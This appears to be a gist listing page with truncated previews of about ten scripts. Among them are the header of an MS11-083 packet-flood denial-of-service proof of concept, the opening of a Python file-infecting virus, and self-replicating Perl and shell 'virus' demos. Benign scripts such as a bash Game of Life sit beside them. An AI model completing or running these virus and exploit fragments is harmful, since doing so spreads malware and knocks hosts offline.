This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
* MS11-083 DoS/PoC exploit | |
* ======================== | |
* This attempts to trigger the ICMP refCount overflow | |
* in TCP/IP stack of Win7/Vista/Win2k8 hosts. This | |
* requires sending 2^32 UDP packets to a host on a closed | |
* port, or 4,294,967,296 packets. A dereference function | |
* must be called that is not triggered via UDP but ICMP | |
* echo packets. This exploit creates 250 threads and | |
* floods a host with UDP packets and then attempts to |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
##http://www.cpan.org/src/5.0/fixsperl-0 | |
## emulate setuid root program | |
#!/usr/bin/perl | |
# Usage: | |
# To fix one or more specific suidperl executables in, say, /usr/bin: | |
# cd /usr/bin | |
# fixsperl sperl?.??? | |
# or, to check all $PATH directories for sperl?.??? and fix them, just say: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/perl -w | |
use strict; | |
use warnings; | |
use Net::TFTP; | |
use Net::Ping; | |
use Data::Dumper; | |
use FileHandle; | |
BEGIN | |
{ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/perl | |
# Self-referencing, static-data permuting bizneratch-o-fun | |
# | |
# Writes a copy of itself out to STDOUT, and executes | |
# $payload (which currently writes to STDERR. | |
# | |
# For best results: | |
# $ ./replicate.pl > replicate.dup | |
# | |
# prole@subterrain.net |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/opt/perl/bin/perl -w | |
use strict; | |
# HACKED | |
BEGIN { | |
local *ME; | |
if (open ME, $0) { | |
local $/; | |
my $me = <ME>; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
import os | |
import datetime | |
SIGNATURE = "CRANKLIN PYTHON VIRUS" | |
def search(path): | |
filestoinfect = [] | |
filelist = os.listdir(path) | |
for fname in filelist: | |
if os.path.isdir(path+"/"+fname): | |
filestoinfect.extend(search(path+"/"+fname)) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/sh | |
#virii bash, by fakessh @ | |
echo "je suis une chaine viral" | |
echo "je suis une chaine porteuse" | |
echo "--------------------------" | |
echo "attention, le petit virus vas sortir" | |
echo "------------------- ------" | |
grep "MvM" $0 | |
echo "il est sortie à l'ecran" | |
echo "mais il peut sortir aussi dans un fichier" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/sh | |
#bsearch.sh by ThreaT | |
for fichier in * | |
do | |
file $fichier > /tmp/t | |
if grep "shell" /tmp/t > /dev/null; then | |
echo "$fichier est un Bourne shell script" | |
fi | |
done | |
rm -f /tmp/t |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# life.sh: "Life in the Slow Lane" | |
# Version 2: Corrigé par Daniel Albers | |
#+ pour permettre d'avoir en entrée des grilles non carrées. | |
# ########################################################################## # | |
# Ce script est la version Bash du "Jeu de la vie" de John Conway. # | |
# "Life" est une implémentation simple d'automatisme cellulaire. # | |
# -------------------------------------------------------------------------- # | |
# Sur un tableau rectangulaire, chaque "cellule" sera soit "vivante" # |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <stdio.h> | |
#include <stdlib.h> /* pour utiliser getenv */ | |
int main(void) | |
{ | |
char *path, *home, *nouveaupath; | |
char assignation[150]; | |
path = getenv("PATH"); | |
home = getenv("HOME"); | |
printf("ancien PATH : %s\net HOME : %s\n", |